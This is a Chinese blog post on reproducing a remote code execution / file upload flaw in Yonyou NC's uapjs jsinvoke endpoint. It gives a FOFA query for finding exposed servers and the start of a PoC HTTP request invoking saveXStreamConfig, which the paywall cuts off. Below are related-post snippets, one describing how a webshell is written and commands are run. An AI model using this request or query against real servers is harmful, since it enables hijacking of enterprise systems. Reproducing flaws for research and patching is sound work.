用友NC-uapjs代码执行漏洞(含批量验证poc)

已于 2024-04-07 14:04:19 修改
阅读量202 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-07 14:04:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137462005
版权

0x01 漏洞分析

用友NC Cloud 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。

image.png

通过MethodInvocationHandler类中的异常处理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口

0x02 漏洞复现

fofa语法:title="YONYOUNC"

影响范围:
包括了nc所有系列版本

poc:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Length: 213
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":[&#
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
CNVD-C-2023-76801:用友NC uapjs RCE漏洞复现[附POC]
薛定谔嘚喵博客
11-08 1077
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs (jsinvoke)应用构造恶意请求非法上传后门程序此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友NC_ResourceManagerServlet_远程代码执行批量验证poc
weixin_43567873的博客
04-17 95
用友NC_ResourceManagerServlet_远程代码执行批量验证poc
[1day]用友NC存在任意文件读取删除漏洞[附批量POC]
Liyu_6618的博客
02-01 551
[1day]用友NC存在任意文件读取删除漏洞[附批量POC]
用友NC-uapjs代码执行漏洞批量验证poc),2024年最新网络安全开发两年
m0_60226911的博客
04-16 312
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。通过MethodInvocationHandler类中的异常处理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口。或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!用友NC Cloud 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。包括了nc所有系列版本。
【1day】复现用友 NC NCFindWeb大型企业数字化平台及用友系统uapjs(jsinvoke)任意文件上传漏洞
记录并分享学习安全的知识点..
07-25 999
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
UAP 从前端到后端 详细教程 (三) WebLet里的代码
胡萧徒的博客
07-29 8361
直接上代码了,这里是 一个比较 简单的 weblet 增删改查的 表单. 项目名为 holiday ,weblet 也叫 holiday. 主要代码在 模块 holiday-basic 里. 我 的数据库 里也有 holiday 这个表. 字段是: MainView 是列表视图(点击新增时触发事件,弹出的对话框),DetailView 是表单视图 提一点,访问 weblet 的 默...
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
热门推荐
0xSec
06-29 1万+
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
QB2767846279
03-27 1698
ncc1909ldap公共入口漏洞补丁。ncc1909ldap公共入口漏洞补丁。ncc2005ldap公共入口漏洞补丁。ncc2005ldap公共入口漏洞补丁。nc633_ldap公共入口漏洞补丁。nc633_ldap公共入口漏洞补丁。nc65_ldap公共入口漏洞补丁。nc65_ldap公共入口漏洞补丁。nc63_ldap公共入口漏洞补丁。nc63_ldap公共入口漏洞补丁。nc57_ldap公共入口漏洞补丁。nc57_ldap公共入口漏洞补丁。
用友NC Cloud存在前台远程命令执行漏洞
失心少年
07-21 582
NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权
用友-NC-Cloud远程代码执行漏洞[2023-HW]
holyxp的博客
08-13 1756
漏洞是通过请求特定的接口,然后调用"nc.itf.iufo.IBaseSPService"服务中的"saveXStreamConfig"方法进行请求;直接往webapps/nc_web/目录写马。最后访问刚才写的马,调用 Runtime.getRuntime().exec(“command”) 来执行系统命令,并通过getInputStream()获取该命令的输出流;然后IOUtils.toString() 方法将输出流转换为字符串。
用友NC Cloud存在前台远程命令执行漏洞POC软件
nnn2188185的博客
07-24 774
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友全版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 2018
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1630
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
用友NC-uapjs代码执行漏洞批量验证poc),2024年最新2024年网络安全网络编程总结篇
最新发布
2301_82243679的博客
04-18 362
包括了nc所有系列版本。
用友nc反序列化漏洞
12-21
用友NC反序列化漏洞是指用友NC软件存在的一种安全漏洞,攻击者可以利用该漏洞向受害者的系统中注入恶意代码,导致系统遭受攻击。该漏洞的成因主要是由于用友NC软件在反序列化过程中存在安全性缺陷,攻击者可以利用这一点来执行未经授权的代码。 攻击者通常会利用一些常见的反序列化漏洞利用技术,如反序列化注入、反序列化利用链等,来利用用友NC软件的漏洞进行攻击。通过构造恶意的序列化数据,攻击者可以在受害者系统中执行恶意代码,包括但不限于执行任意命令、获取系统权限、窃取敏感信息等行为。 为了防范用友NC反序列化漏洞的攻击,用户和系统管理员可以采取一些措施,如及时安装官方发布的安全补丁、加强系统安全配置、限制用户权限、使用安全的序列化与反序列化机制等。另外,对于已知的漏洞利用技术,用户还可以利用防火墙、入侵检测系统等安全设备进行监测和阻断。 总之,要防范用友NC反序列化漏洞的攻击,需要用户和系统管理员密切关注安全动态,及时采取必要的安全措施来保护系统和数据的安全。同时,用友NC软件的开发者也应及时修复这类漏洞,加强软件的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值